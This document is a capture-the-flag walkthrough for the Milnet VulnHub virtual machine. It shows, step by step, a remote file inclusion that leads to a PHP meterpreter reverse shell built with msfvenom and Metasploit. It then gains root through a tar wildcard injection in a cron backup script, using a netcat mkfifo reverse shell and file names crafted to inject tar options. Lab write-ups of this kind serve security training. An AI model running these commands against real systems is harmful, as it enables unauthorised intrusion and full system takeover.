Hack the Milnet VM (CTF Challenge)

This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.
Download the VM from –> https://www.vulnhub.com/entry/milnet-1,148/
Breaching Methodology
Network Scanning (Nmap)
Recon (Nikto)
LFI due to allow_url_inclued
Install Tamper data (Firefox plugin)
Generate PHP Backdoor (Msfvenom)
Upload and execute a backdoor
Reverse connection (Metasploit)
Open UNIX wildcard text file
Privilege Escalation (cron job)
Import python one-liner for proper TTY shell
Take root access and capture the flag

Let’s start
As always start off by locating the target with the netdiscover command.  Our target is Now we will scan our target with nmap to know all about its ports.
nmap  -A -p-

Since port 80 was open for http, therefore, we had explored target IP on the browser but didn't get any useful information. So further we have decided to use Nikto against target URL.

To know more about our target we will use Nikto.
nikto -h
As per result dumped by Nikto it tells something about info.php, let verify it.

So when we have browsed, we found “allow_url_inclued” is “on” which means we can call any local or remote file and hence it is pointing towards LFI and RFI vulnerability.

Upon finding the said vulnerability our step was clear i.e. we had use Tamper data.
So go to Tools on the menu bar and select Tamper data, When the Tamper Data opens click on Start Tamper.

Now generate the PHP code with the help of which we will have our meterpreter session and to generate the code type:
msfvenom php/meterpreter/reverse_tcp lhost=192.1681.108 lport=4444 -f raw
Copy the code from  to die() and save it on the file with extension .php, we have saved it as shell.php on the desktop and run command python SimpleHTTPSever 80 for transferring it into target’s system.

Then on Tamper Data give the path of the file without the extension in the text box adjacent to the route. For example type:

Before clicking on OK run metasploit and type:
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:
Then check the list of the thing present in langman by typing :
There is only one folder available so let’s go into it.
ls(to check the contents of SDINET)
Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains Unix wildcard attacks.

Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:
cat /etc/crontab
cat /backup/backup.sh

On a new terminal generate one-liner malicious code for achieving netcat reverse connection using msfvenom and enter following command for that.
msfvenom -p cmd/unix/reverse_netcat lhost= lport=8888 R
After that copy and paste the generated code inside meterpreter session as described below and start netcat.
nc -lvp 8888

This will help us to achieve arbitrary command execution stemming from the tar command within the backup.sh script.
Next we ran the following commands inside meterperter session:
python3 -c 'import pty;pty.spawn("/bin/bash")'

echo "mkfifo /tmp/ivkwne; nc 8888 0
/tmp/ivkwne 2>&1; rm /tmp/ivkwne" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888.
And if you go back to the terminal window where the listener was on.


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